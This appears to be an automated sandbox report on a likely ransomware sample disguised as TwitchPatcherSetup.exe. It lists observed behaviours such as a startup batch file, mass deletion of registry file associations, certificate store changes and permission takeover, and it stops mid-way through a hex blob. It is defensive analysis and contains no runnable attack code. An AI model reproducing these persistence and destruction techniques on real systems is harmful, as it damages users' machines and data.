Malware Analysis Report

2024-11-16 12:47

Sample ID 240806-x9t53aybkl
Target TwitchPatcherSetup.exe
SHA256 df9336b06d2a84b387a5d597d5d1ac01b81523c059cf535b53b1d43bfcedf5d7
Tags
discovery exploit persistence privilege_escalation ransomware
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

df9336b06d2a84b387a5d597d5d1ac01b81523c059cf535b53b1d43bfcedf5d7

Threat Level: Likely malicious

The file TwitchPatcherSetup.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit persistence privilege_escalation ransomware

Possible privilege escalation attempt

Blocklisted process makes network request

Checks computer location settings

Drops startup file

Event Triggered Execution: Component Object Model Hijacking

Executes dropped EXE

Modifies file permissions

Modifies system executable filetype association

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Modifies system certificate store

Delays execution with timeout.exe

Kills process with taskkill

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

Uses Volume Shadow Copy WMI provider

Runs net.exe

Script User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 19:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win7-20240708-en

Max time kernel

82s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers\Compatibility C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\{8895b1c6-b41f-4c1c-a562-0d564250836f} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers C:\Windows\system32\reg.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\EMAIL_~2.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ENDED_~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~2.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXE8SH~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMPRO~1.CER C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\END_RE~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~2.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CRYPTO~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LOGSES~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\vdk150.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\LICENS~1.HTM C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\STANDA~1.PDF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MYRIAD~1.OTF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SUBMIS~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CRYPTO~1.SIG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE78D9~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXSLE.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSIG~1.PDF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\STOP_C~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\CREATE~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RECDE7~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ADD_RE~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~4.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE99D5~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPU~1.INI C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\DISTRI~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~2.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNON~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ahclient.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~3.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNON~2.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CCME_B~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\JP2KLib.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ADOBEU~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\atl.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\OPEN_O~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~3.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DEFAUL~1.PDF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ADOBEL~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORM_R~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\DllHost.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.gif\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.jnlp C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.psd1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{367E582C-F71C-4BF9-AA1B-9F62B793E9C5} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.pmc\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0006F056-0000-0000-C000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{73A4C9C1-D68D-11D0-98BF-00A0C90DC8D9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C7DFFDF1-BD1F-450A-B98D-96B6D30BA4C1} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.website C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.bsc C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.vss C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\removeproperties\DropTarget C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.aps\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0006F045-0000-0000-C000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A1EB89D6-0A9C-4575-A0AE-654A990A454C} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBC} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.hdp\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Access.Shortcut.Query.1\shell\Preview\ddeexec C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0073-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\AcroIEHelperShim.DLL C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{435fdba0-964c-43a7-8aff-cc94e21b2249} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C100BEDB-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBA} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B5C71A93-FA82-4672-8B6A-E2C0FF64FF9D}\Programmable C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mpg\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A03CD5F0-3045-11CF-8C44-00AA006B6814}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C41662BB-1FA0-4CE0-8DC5-9B7F8279FF97}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBB} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\PropertySheetHandlers\{7EFA68C6-086B-43e1-A2D2-55A113531240} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8075737C-5146-11D5-A672-00B0D022E945} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.i C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Access.Shortcut.Query.1\shell\print\ddeexec C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mk C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mv\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3B06E945-E47C-11CD-8701-00AA003F0F07}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{83081C08-382C-4ED4-ACCF-DCBECA021010}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Access.Shortcut.Function.1\shell\Open\ddeexec\application C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000507-0000-0010-8000-00AA006D2EA4}\ProgID C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000535-0000-0010-8000-00AA006D2EA4}\VersionIndependentProgID C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0014-0001-0003-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.dib\OpenWithProgids C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mdt\Access.WizardDataFile.14 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.dic\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.pst\Outlook.File.pst.14 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Access.Shortcut.Report.1\shell\Browse\ddeexec C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.msg\Outlook.File.msg.14\ShellNew C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Access.Shortcut.StoredProcedure.1\shell\Design C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\BCSAddin.ManageSolutionHelper.1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBC} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CD000011-8B95-11D1-82DB-00C04FB1625D}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.jtx\shellex C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{86d5eb8a-859f-4c7b-a76b-2bd819b7a850} C:\Windows\system32\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Windows\System32\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a437962657254